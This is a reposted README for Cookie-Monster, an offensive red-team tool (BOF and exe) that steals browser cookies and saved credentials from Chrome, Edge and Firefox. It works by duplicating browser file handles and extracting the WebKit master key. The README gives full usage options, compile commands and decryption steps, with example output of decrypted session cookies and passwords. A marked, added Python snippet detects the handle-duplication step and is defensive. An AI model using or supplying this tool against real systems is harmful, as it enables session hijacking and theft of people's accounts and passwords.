Cookie-Monster – BOF To Steal Browser Cookies & Credentials

Steal browser cookies for Edge, Chrome and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files and download them. A separate GitHub repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <pid> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid> ]
cookie-monster Example:
   cookie-monster --chrome
   cookie-monster --edge
   cookie-monster --firefox
   cookie-monster --chromeCookiePID 1337
   cookie-monster --chromeLoginDataPID 1337
   cookie-monster --edgeCookiePID 4444
   cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
    --chrome, looks at all running processes and their handles; if a process matches chrome.exe, copies its handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and their handles; if a process matches msedge.exe, copies its handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json files
    --chromeCookiePID, if the chrome.exe PID that holds a handle to Cookies is already known, specify it to duplicate that handle and copy the file
    --chromeLoginDataPID, if the chrome.exe PID that holds a handle to Login Data is already known, specify it to duplicate that handle and copy the file
    --edgeCookiePID, if the msedge.exe PID that holds a handle to Cookies is already known, specify it to duplicate that handle and copy the file
    --edgeLoginDataPID, if the msedge.exe PID that holds a handle to Login Data is already known, specify it to duplicate that handle and copy the file
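A detection-side view of the handle duplication step the options above describe, as an added example that is not part of Cookie-Monster: it scans Sysmon-style ProcessAccess (Event ID 10) records for a non-browser process that opened a browser process with the PROCESS_DUP_HANDLE right, which DuplicateHandle() needs. The event lines are constructed, and the one-event-per-line `key=value|key=value` layout is an assumption made for this example rather than Sysmon's real record format.

```python
# Added example (not part of Cookie-Monster): flag Sysmon-style ProcessAccess
# events where a non-browser process opened a browser with PROCESS_DUP_HANDLE,
# the right required to duplicate a handle out of that browser process.

PROCESS_DUP_HANDLE = 0x0040   # DuplicateHandle() on another process needs this right
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")

# Constructed sample events (one per line, key=value pairs separated by '|');
# shaped after Sysmon Event ID 10 fields, but not real telemetry.
SAMPLE_EVENTS = r"""
SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Program Files\Google\Chrome\Application\chrome.exe|GrantedAccess=0x1000
SourceImage=C:\Program Files\Google\Chrome\Application\chrome.exe|TargetImage=C:\Program Files\Google\Chrome\Application\chrome.exe|GrantedAccess=0x1FFFFF
SourceImage=C:\Users\bob\AppData\Local\Temp\updater.exe|TargetImage=C:\Program Files\Microsoft\Edge\Application\msedge.exe|GrantedAccess=0x40
SourceImage=C:\Users\bob\AppData\Local\Temp\updater.exe|TargetImage=C:\Program Files\Google\Chrome\Application\chrome.exe|GrantedAccess=0x1FFFFF
SourceImage=C:\Windows\System32\csrss.exe|TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe|GrantedAccess=0x1400
"""

def parse_event(line):
    """Turn one 'k=v|k=v' line into a dict; returns None for blank lines."""
    line = line.strip()
    if not line:
        return None
    return dict(part.split("=", 1) for part in line.split("|"))

def basename(path):
    """Last path component, lower-cased, so image paths compare by file name."""
    return path.rsplit("\\", 1)[-1].lower()

def is_suspicious(ev):
    """True when a non-browser process opened a browser with PROCESS_DUP_HANDLE."""
    src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    access = int(ev["GrantedAccess"], 16)
    if tgt not in BROWSERS or src in BROWSERS:
        return False          # browsers open their own child processes constantly
    return bool(access & PROCESS_DUP_HANDLE)

def find_suspicious(text):
    """Return (source, target, granted access) tuples for matching events."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev and is_suspicious(ev):
            hits.append((basename(ev["SourceImage"]), basename(ev["TargetImage"]), ev["GrantedAccess"]))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("suspicious ProcessAccess:", hit)
```

Expect noise from security products and system components that legitimately hold this right on browser processes; an allow-list of known SourceImage paths is needed before this becomes an alert rather than a hunt query.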

EXE usage

Cookie Monster Example:
  cookie-monster.exe --all 
Cookie Monster Options:
  -h, --help                     Show this help message and exit
  --all                          Run chrome, edge, and firefox methods
  --edge                         Extract edge keys and download Cookies/Login Data file to PWD
  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD
  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the WebKit master key

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:

https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

make

To compile the exe on Windows:

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support Firefox based on firepwd and add a bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!

Cookie Webkit Master Key Extractor: https://github.com/MrUn1k0d3r/CookieGraberBOF

Fileless download: https://github.com/fortra/nanodump

Decrypt Cookies and Login Data: https://github.com/loginsecurite/DonPAPI

Originally published by FARADAYSEC: Cookie-Monster – BOF To Steal Browser Cookies & Credentials

Posted by admin on 27 April 2024 at 9:59 PM.